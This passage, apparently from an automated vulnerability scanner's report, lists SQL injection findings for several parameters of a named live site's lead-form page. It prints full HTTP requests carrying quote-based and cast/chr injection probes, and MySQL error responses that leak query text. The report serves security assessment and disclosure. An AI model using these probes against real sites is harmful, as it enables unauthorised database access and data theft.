GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise'&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:20:54 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=nrfitr0ea5kk7gqc0n33tqhni2; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8318


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
t committed or do not have lines currently&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=110006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'No - we are not committed or do not have lines currently&button3=Submit&companyn' at line 5

Request 2

GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise''&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:20:55 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=2uusfdq3lldbjn4qqedarpjop7; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 50912


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.408. http://www.insideup.com/ppc/leadflow/incn00/project.php [attributeId_517 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/incn00/project.php

Issue detail

The attributeId_517 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_517 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently'&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:21:50 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=837cvqhgp4a5nkc2uv32258uq7; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8318


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
committed or do not have lines currently'&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=110006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subc' at line 5

Request 2

GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently''&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:21:51 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=penuqmbeppcv06o7amo62kq0u0; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 50912


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.409. http://www.insideup.com/ppc/leadflow/incn00/project.php [button3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/incn00/project.php

Issue detail

The button3 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the button3 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit'&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:22:18 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=keg1mmomu6m6kes91sflt6esq7; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8318


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
committed or do not have lines currently&button3=Submit'&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=110006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subc' at line 5

Request 2

GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit''&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:22:18 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=oede17e4elf74n1u8uiksb0et2; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 50912


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.410. http://www.insideup.com/ppc/leadflow/incn00/project.php [catId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/incn00/project.php

Issue detail

The catId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the catId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/incn00/project.php?catId=110006'&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:15:31 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=7mdj4fjpacmglpg4q556m1um04; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8318


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
t committed or do not have lines currently&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=110006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'numeric)&attributeId_342_g=2017__Accounting/Finance&attributeId_343_g=2009__1-9&' at line 5

Request 2

GET /ppc/leadflow/incn00/project.php?catId=110006''&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 02:15:31 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=cdj4kn1ehkjebt5hjjrfunvre3; path=/
Content-Length: 106
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/incn00/project.php was not found on this server.</p>

1.411. http://www.insideup.com/ppc/leadflow/incn00/project.php [companyname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/incn00/project.php

Issue detail

The companyname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the companyname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:22:59 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=2djh9ho8g06odqk9mq84266oj7; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8318


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
committed or do not have lines currently&button3=Submit&companyname=Company Name'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=110006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&lastname=Last Name&phone=Phone&subcategoryId=110006&website=n/a&zip=Zip cod' at line 5

Request 2

GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name''&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:23:02 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=fd9q8eu9d6u00fv29quokam8j0; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 50912


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.412. http://www.insideup.com/ppc/leadflow/incn00/project.php [emailaddress parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/incn00/project.php

Issue detail

The emailaddress parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the emailaddress parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email'&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:23:43 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=g8lhjrtjncgcv9imisjtqiol27; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8318


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
committed or do not have lines currently&button3=Submit&companyname=Company Name&emailaddress=Email'&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=110006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&lastname=Last Name&phone=Phone&subcategoryId=110006&website=n/a&zip=Zip cod' at line 5

Request 2

GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email''&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:23:43 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=cmoegg119jvpmjflvfjkrfrd76; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 50912


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.413. http://www.insideup.com/ppc/leadflow/incn00/project.php [firstname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/incn00/project.php

Issue detail

The firstname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the firstname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

